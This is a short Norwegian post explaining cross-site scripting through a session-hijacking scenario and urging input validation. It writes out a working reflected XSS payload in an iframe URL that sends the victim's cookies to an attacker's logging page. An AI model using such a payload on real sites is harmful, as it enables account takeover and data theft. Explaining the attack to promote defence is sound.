Dette er et problem som kalles XSS, og kan være potensielt langt mer skadelig enn man i utgangspunktet skulle tro. Eksempelet mitt var selvsagt ikke særlig farlig, så la oss se for oss et mer kritisk scenario.
La oss si at dette webutviklingsfirmaet har en kundekonto som du er logget inn på når du er på siden. Du besøker (noenlunde) samtidig webforumet.no i god tro, men Kenneth har tatt på seg sin svarte hatt den dagen. Nederst på webforumet ligger det nå en iframe med src til http://www.fiktivtwebfirma.no/sok?q="><script type="text/javascript">new Image().src = "http://webforumet.no/cookielog.php?c=" + encodeURI(document.cookie);</script>
Kenneth sitter online og venter på at cookie dataene skal komme. Han stjeler session IDen din, går til fiktivtwebfirma.no med en forfalsket kake og er logget inn som deg, med alle dine rettigheter og tilgang til informasjon.
Jeg ville aldri akseptert en løsning der mine kundedata var lett tilgjenglig med litt teknisk innsikt. God validering er alfa og omega. Man kan lese mer om XSS på wikipedia,
Cross-site scripting - Wikipedia, the free encyclopedia.
